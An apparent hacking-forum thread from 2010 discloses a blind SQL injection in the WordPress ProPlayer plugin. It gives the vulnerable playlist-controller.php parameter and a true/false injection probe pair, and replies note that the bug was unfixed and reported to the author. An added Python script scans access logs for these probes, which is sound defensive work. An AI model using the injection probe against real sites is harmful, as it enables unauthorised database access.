EvilZone

: WP-ProPlayer Plugin Blind SQL Injection
: ca0s December 11, 2010, 11:09:09 PM
<-------

   WP-ProPlayer Blind SQL Injection

   Founder: Ca0s

   Visit:
      st4ck-3rr0r.blogspot.com
      ka0-labs.org
   Shouts @
      evilzone.org
      elhacker.net
      diosdelared.com

------->
<-------

   Software: ProPlayer <= 4.7.7
   URL:
      http://wordpress.org/extend/plugins/proplayer/
      http://isagoksu.com/proplayer-wordpress-plugin/
   Vuln: Blind SQL Injection ->
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

   Note: some servers filter ' to %27, so it won't work this way.

------->
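A log check a site operator could run for the probe shape in the advisory above, added here as an example (not part of the original post or the plugin). The access-log lines are constructed, and the regexes are assumptions about what such probes look like once the query string is URL-decoded, which also covers the %27-encoded quote mentioned in the note.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (not from the original post). Lines 1-2 mirror
# the true/false probe pair from the advisory, line 3 is the %27-encoded variant the
# note refers to, lines 4-5 are benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2010:23:09:09 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=3')+and+('a'='a HTTP/1.1" 200 512
10.0.0.5 - - [11/Dec/2010:23:09:10 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=3')+and+('a'='b HTTP/1.1" 200 88
10.0.0.5 - - [11/Dec/2010:23:09:11 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=3%27)+and+(%27a%27=%27a HTTP/1.1" 200 512
10.0.0.9 - - [11/Dec/2010:23:10:00 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=3 HTTP/1.1" 200 512
10.0.0.9 - - [11/Dec/2010:23:10:01 +0000] "GET /index.php?p=12 HTTP/1.1" 200 4096
"""

# Pull the request path (with query string) out of a combined-format log line.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

# Assumed boolean-probe shape: a quote (optionally closing a paren), AND/OR, then a
# quoted comparison. Applied after URL decoding so %27 and + are normalised first.
PROBE_RE = re.compile(r"['\"]\)?\s*(?:and|or)\s*\(?\s*['\"]?\w+['\"]?\s*=", re.IGNORECASE)


def is_sqli_probe(value: str) -> bool:
    """True if a parameter value (raw or already decoded) looks like a boolean probe."""
    return PROBE_RE.search(unquote_plus(value)) is not None


def scan_log(text: str) -> list:
    """Return one record per suspicious playlist-controller.php request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m or "playlist-controller.php" not in m.group("path"):
            continue
        # parse_qs already decodes %27 and turns '+' into a space.
        params = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
        for raw in params.get("pp_playlist_id", []):
            if is_sqli_probe(raw):
                hits.append({"line": lineno, "client": line.split()[0],
                             "value": unquote_plus(raw)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```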
: Re: WP-ProPlayer Plugin Blind SQL Injection
: ande December 12, 2010, 12:06:11 AM
Vulnerability status? I couldn't find any fix notes on their site.
: Re: WP-ProPlayer Plugin Blind SQL Injection
: ca0s December 12, 2010, 12:58:06 AM
Unfixed.
I reported it to author.
: Re: WP-ProPlayer Plugin Blind SQL Injection
: ande December 12, 2010, 01:04:08 AM
Unfixed.
I reported it to author.

Sweet, better hope they fix it quick :P
: Re: WP-ProPlayer Plugin Blind SQL Injection
: solar February 25, 2011, 07:24:13 PM
Cool... nice find.